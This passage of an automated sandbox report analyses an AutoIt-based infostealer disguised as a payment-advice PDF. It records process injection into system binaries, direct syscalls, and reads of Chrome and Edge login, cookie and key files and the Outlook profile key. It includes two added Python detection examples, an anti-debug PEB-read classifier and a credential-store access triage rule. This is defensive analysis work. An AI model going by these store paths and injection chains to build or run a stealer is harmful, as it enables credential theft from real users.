                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B0946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03904940 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03856962 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0387096E mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0387096E mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038D4978 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038BC97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03830887 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038BC89D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0385E8C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_039008C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038FA8E4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0386C8F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038BC810 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03852835 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe Code function: 0_2_008980A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe Code function: 0_2_0086A124 SetUnhandledExceptionFilter
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe Code function: 0_2_0086A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter
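The report lists every `mov r32, dword ptr fs:[00000030h]` in the injected svchost.exe image (process 8) as a PEB read, but not which PEB field the code reads next, and that is what separates an anti-debug check from the ordinary API-resolution walk of a position-independent payload. The scanner below is an added example, not Joe Sandbox code: it finds the x86 encodings of the fs:[30h] load, then looks a few bytes ahead for a `[reg+disp8]` access and names the field from the documented 32-bit PEB layout (BeingDebugged at +0x02, Ldr at +0x0C, NtGlobalFlag at +0x68). The opcode coverage in `_disp8_reads` and the sample buffer are assumptions made for the example; the buffer is constructed, not dumped from the sample.

```python
"""
Classify 32-bit PEB reads (mov r32, dword ptr fs:[30h]) in a raw code buffer.

Added example for this report page; it is not Joe Sandbox code. The byte
patterns are the standard x86 encodings and the PEB offsets are the documented
32-bit layout. SAMPLE_CODE is constructed, not dumped from the analysed process.
"""
from collections import Counter
from typing import Iterator, NamedTuple, Optional

# 32-bit PEB fields worth naming in triage (documented layout)
PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x68: "NtGlobalFlag"}
_REG_NAMES = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


class PebAccess(NamedTuple):
    offset: int      # offset of the fs:[30h] load inside the buffer
    register: str    # register that receives the PEB pointer
    purpose: str     # PEB field read through that register, or "unknown"


def _peb_load_at(code: bytes, i: int) -> Optional[tuple[int, int]]:
    """Return (dest_reg, insn_len) if a `mov r32, fs:[30h]` starts at offset i."""
    if code[i] != 0x64:                                   # FS segment override prefix
        return None
    if code[i + 1:i + 6] == b"\xA1\x30\x00\x00\x00":      # short form: mov eax, fs:[30h]
        return 0, 6
    if (code[i + 1:i + 2] == b"\x8B" and len(code) >= i + 7
            and (code[i + 2] & 0xC7) == 0x05              # ModRM mod=00, rm=101 (disp32)
            and code[i + 3:i + 7] == b"\x30\x00\x00\x00"):
        return (code[i + 2] >> 3) & 7, 7                  # ModRM form: mov r32, fs:[30h]
    return None


def _disp8_reads(window: bytes, base_reg: int) -> Iterator[int]:
    """Yield disp8 values of [base_reg+disp8] operands found in `window`.

    Opcodes covered (an assumption for the example): 8B (mov r32), 8A (mov r8),
    0F B6 (movzx r32, r/m8), 80 (cmp/and/... r/m8, imm8), F6 (test r/m8, imm8).
    esp as a base register needs a SIB byte and is skipped.
    """
    if base_reg == 4:
        return
    i = 0
    while i + 2 < len(window):
        if window[i] == 0x0F and window[i + 1] == 0xB6:
            modrm_at = i + 2
        elif window[i] in (0x8B, 0x8A, 0x80, 0xF6):
            modrm_at = i + 1
        else:
            i += 1
            continue
        if modrm_at + 1 < len(window):
            modrm = window[modrm_at]
            if (modrm >> 6) == 1 and (modrm & 7) == base_reg:   # mod=01: [reg+disp8]
                yield window[modrm_at + 1]
        i += 1


def find_peb_accesses(code: bytes, lookahead: int = 16) -> list[PebAccess]:
    """Locate every fs:[30h] load and name the PEB field read right after it."""
    found = []
    i = 0
    while i < len(code):
        hit = _peb_load_at(code, i)
        if hit is None:
            i += 1
            continue
        reg, length = hit
        purpose = "unknown"
        for disp in _disp8_reads(code[i + length:i + length + lookahead], reg):
            if disp in PEB_FIELDS:
                purpose = PEB_FIELDS[disp]
                break
        found.append(PebAccess(i, _REG_NAMES[reg], purpose))
        i += length
    return found


def summarize(code: bytes) -> dict[str, int]:
    """Count PEB accesses by purpose; the number to put in a triage note."""
    return dict(Counter(a.purpose for a in find_peb_accesses(code)))


# Constructed sample: four PEB loads, three followed by a recognisable field read
SAMPLE_CODE = (
    b"\x64\xA1\x30\x00\x00\x00"        # mov eax, fs:[30h]
    b"\x80\x78\x02\x00"                # cmp byte ptr [eax+2], 0   -> BeingDebugged
    b"\x90\x90"
    b"\x64\x8B\x15\x30\x00\x00\x00"    # mov edx, fs:[30h]
    b"\x8B\x52\x0C"                    # mov edx, [edx+0Ch]        -> Ldr (API resolution)
    b"\x90\x90"
    b"\x64\x8B\x35\x30\x00\x00\x00"    # mov esi, fs:[30h]
    b"\x8B\x46\x68"                    # mov eax, [esi+68h]        -> NtGlobalFlag
    b"\x90\x90"
    b"\x64\xA1\x30\x00\x00\x00"        # mov eax, fs:[30h]
    b"\xC3"                            # ret: no field read inside the window
)

if __name__ == "__main__":
    for access in find_peb_accesses(SAMPLE_CODE):
        print(f"+0x{access.offset:04X} {access.register:<3} -> {access.purpose}")
    print(summarize(SAMPLE_CODE))
```

Run it over the unpacked image (`8.2.svchost.exe.400000.0.unpack` in this report) rather than the on-disk sample, since the loads are in the injected payload, not in the AutoIt stub. A function where the load is followed by a +0x02 or +0x68 read is an anti-debug site; one followed by a +0x0C read is the Ldr walk and is expected in any payload that resolves its own imports, so it is not evidence of debugger detection on its own.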

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtWriteVirtualMemory: Direct from: 0x77762E3C
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtMapViewOfSection: Direct from: 0x77762D1C
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtNotifyChangeKey: Direct from: 0x77763C2C
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtCreateMutant: Direct from: 0x777635CC
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtResumeThread: Direct from: 0x777636AC
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtProtectVirtualMemory: Direct from: 0x77757B2E
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtQuerySystemInformation: Direct from: 0x77762DFC
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtAllocateVirtualMemory: Direct from: 0x77762BFC
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtReadFile: Direct from: 0x77762ADC
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtDelayExecution: Direct from: 0x77762DDC
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtWriteVirtualMemory: Direct from: 0x7776490C
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtQueryInformationProcess: Direct from: 0x77762C26
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtResumeThread: Direct from: 0x77762FBC
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtCreateUserProcess: Direct from: 0x7776371C
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtSetInformationThread: Direct from: 0x777563F9
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtAllocateVirtualMemory: Direct from: 0x77763C9C
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtSetInformationThread: Direct from: 0x77762B4C
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtQueryAttributesFile: Direct from: 0x77762E6C
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtReadVirtualMemory: Direct from: 0x77762E8C
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtCreateKey: Direct from: 0x77762C6C
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtQuerySystemInformation: Direct from: 0x777648CC
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtAllocateVirtualMemory: Direct from: 0x777648EC
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtQueryVolumeInformationFile: Direct from: 0x77762F2C
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtOpenSection: Direct from: 0x77762E0C
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtDeviceIoControlFile: Direct from: 0x77762AEC
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtAllocateVirtualMemory: Direct from: 0x77762BEC
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtQueryInformationToken: Direct from: 0x77762CAC
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtTerminateThread: Direct from: 0x77762FCC
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtCreateFile: Direct from: 0x77762FEC
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtOpenFile: Direct from: 0x77762DCC
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtOpenKeyEx: Direct from: 0x77762B9C
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtSetInformationProcess: Direct from: 0x77762C5C
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe NtProtectVirtualMemory: Direct from: 0x77762F9C
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\rasautou.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: NULL target: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe protection: read write
                Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: NULL target: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\rasautou.exe Thread register set: target process: 3020
                Source: C:\Windows\SysWOW64\rasautou.exe Thread APC queued: target process: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2D81008
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe Code function: 0_2_008987B1 LogonUserW
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe Code function: 0_2_00843B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe Code function: 0_2_008448D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe Code function: 0_2_008A4C27 mouse_event
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe"
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe Process created: C:\Windows\SysWOW64\rasautou.exe "C:\Windows\SysWOW64\rasautou.exe"
                Source: C:\Windows\SysWOW64\rasautou.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe Code function: 0_2_00897CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe Code function: 0_2_0089874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: rPaymentAdviceNote_pdf.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: rPaymentAdviceNote_pdf.exe, lDBisuvfBkK.exe, 0000000A.00000000.1367828999.0000000001740000.00000002.00000001.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000A.00000002.3093108857.0000000001740000.00000002.00000001.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000000.1520531393.0000000001320000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: lDBisuvfBkK.exe, 0000000A.00000000.1367828999.0000000001740000.00000002.00000001.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000A.00000002.3093108857.0000000001740000.00000002.00000001.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000000.1520531393.0000000001320000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                Source: lDBisuvfBkK.exe, 0000000A.00000000.1367828999.0000000001740000.00000002.00000001.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000A.00000002.3093108857.0000000001740000.00000002.00000001.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000000.1520531393.0000000001320000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: ?Program Manager
                Source: lDBisuvfBkK.exe, 0000000A.00000000.1367828999.0000000001740000.00000002.00000001.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000A.00000002.3093108857.0000000001740000.00000002.00000001.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000000.1520531393.0000000001320000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe Code function: 0_2_0086862B cpuid
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe Code function: 0_2_00874E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe Code function: 0_2_00881E06 GetUserNameW
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe Code function: 0_2_00873F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe Code function: 0_2_008449A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

                Stealing of Sensitive Information

                Source: Yara matchFile source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.3093757528.00000000041C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1448964274.0000000006B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1445662194.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3091105288.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3096255257.0000000005030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1446968619.0000000004FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3093726218.0000000004730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3093625342.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\rasautou.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\rasautou.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\rasautou.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\rasautou.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\rasautou.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\rasautou.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\rasautou.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\rasautou.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\rasautou.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: rPaymentAdviceNote_pdf.exe | Binary or memory string: WIN_81
Source: rPaymentAdviceNote_pdf.exe | Binary or memory string: WIN_XP
Source: rPaymentAdviceNote_pdf.exe | Binary or memory string: WIN_XPe
Source: rPaymentAdviceNote_pdf.exe | Binary or memory string: WIN_VISTA
Source: rPaymentAdviceNote_pdf.exe | Binary or memory string: WIN_7
Source: rPaymentAdviceNote_pdf.exe | Binary or memory string: WIN_8
Source: rPaymentAdviceNote_pdf.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
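The file and registry accesses listed above are the observable side of the "Tries to harvest and steal browser information" and "Tries to steal Mail credentials" signatures: a Windows system binary (rasautou.exe, running injected code) reads the Chromium credential stores of two different browsers and then the Outlook MAPI profile key. The Python below is an added example, not part of the Joe Sandbox report or of any vendor's tooling. It runs a triage rule over a constructed list of file-open and key-open events shaped like the lines above (the rasautou.exe events reproduce the report's own paths; the chrome.exe control event, the owner allowlist and the function names are assumptions of the example) and escalates when a process that is neither a browser nor a mail client sweeps the stores of more than one application.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Set, Tuple


@dataclass(frozen=True)
class AccessEvent:
    process: str  # image name of the process performing the access
    op: str       # "file_open" or "key_open"
    target: str   # file path or registry key path


@dataclass
class Finding:
    browsers: Set[str] = field(default_factory=set)  # vendors whose stores were read
    outlook: bool = False                            # MAPI profile key queried


# Chromium-profile credential stores: Login Data (saved passwords), Web Data
# (autofill and cards), Cookies, and Local State (DPAPI-wrapped profile key).
# The report shows the "Network\" subfolder being probed too, so it is optional.
BROWSER_STORE = re.compile(
    r"\\(?P<vendor>Google\\Chrome|Microsoft\\Edge)\\User Data\\[^\\]+\\"
    r"(?:Network\\)?(?:Login Data|Web Data|Cookies|Local State)$",
    re.IGNORECASE,
)
# MAPI profile hive read to locate stored mail account settings.
OUTLOOK_PROFILE_KEY = re.compile(
    r"^HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\"
    r"Windows Messaging Subsystem\\Profiles\\",
    re.IGNORECASE,
)
# Assumed allowlist: the one process expected to read each vendor's profile.
# A production rule should key this on the signed image path, not the image name.
OWNER_OF = {"google\\chrome": "chrome.exe", "microsoft\\edge": "msedge.exe"}
MAIL_CLIENTS = {"outlook.exe"}


def triage(events: List[AccessEvent]) -> Dict[str, Finding]:
    """Collect credential-store accesses by processes that should not make them."""
    findings: Dict[str, Finding] = {}
    for ev in events:
        proc = ev.process.lower()
        if ev.op == "file_open":
            m = BROWSER_STORE.search(ev.target)
            if m is None:
                continue
            vendor = m.group("vendor").lower()
            if OWNER_OF.get(vendor) == proc:
                continue  # a browser reading its own profile is expected
            findings.setdefault(proc, Finding()).browsers.add(vendor)
        elif ev.op == "key_open":
            if OUTLOOK_PROFILE_KEY.match(ev.target) and proc not in MAIL_CLIENTS:
                findings.setdefault(proc, Finding()).outlook = True
    return findings


def verdicts(findings: Dict[str, Finding]) -> List[Tuple[str, str]]:
    """One foreign process sweeping several stores is the infostealer pattern;
    a single store touched by, say, a backup tool is only flagged 'suspicious'."""
    out = []
    for proc, f in sorted(findings.items()):
        sweep = len(f.browsers) >= 2 or (bool(f.browsers) and f.outlook)
        out.append((proc, "credential-harvesting" if sweep else "suspicious"))
    return out


# Constructed sample: the rasautou.exe events reproduce the paths the report lists;
# the chrome.exe event is an added benign control case.
SAMPLE_EVENTS = [
    AccessEvent("rasautou.exe", "file_open", r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies"),
    AccessEvent("rasautou.exe", "file_open", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data"),
    AccessEvent("rasautou.exe", "file_open", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    AccessEvent("rasautou.exe", "file_open", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State"),
    AccessEvent("rasautou.exe", "file_open", r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"),
    AccessEvent("rasautou.exe", "key_open",
                "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\"),
    AccessEvent("chrome.exe", "file_open", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
]

if __name__ == "__main__":
    for proc, label in verdicts(triage(SAMPLE_EVENTS)):
        print(f"{proc}: {label}")
```

The allowlist keyed on image name is deliberately the weakest part: a stealer can be renamed chrome.exe, so a real deployment should compare the accessing image's full path and signer against the vendor's install location, and should also correlate with the injection signatures the report raises for the same process.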

Remote Access Functionality

Source: Yara match | File source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.3093757528.00000000041C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1448964274.0000000006B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1445662194.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3091105288.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.3096255257.0000000005030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1446968619.0000000004FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3093726218.0000000004730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3093625342.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: 0_2_008B6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: 0_2_008B6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket

MITRE ATT&CK Matrix (a leading number is the count of matching signatures for that technique)

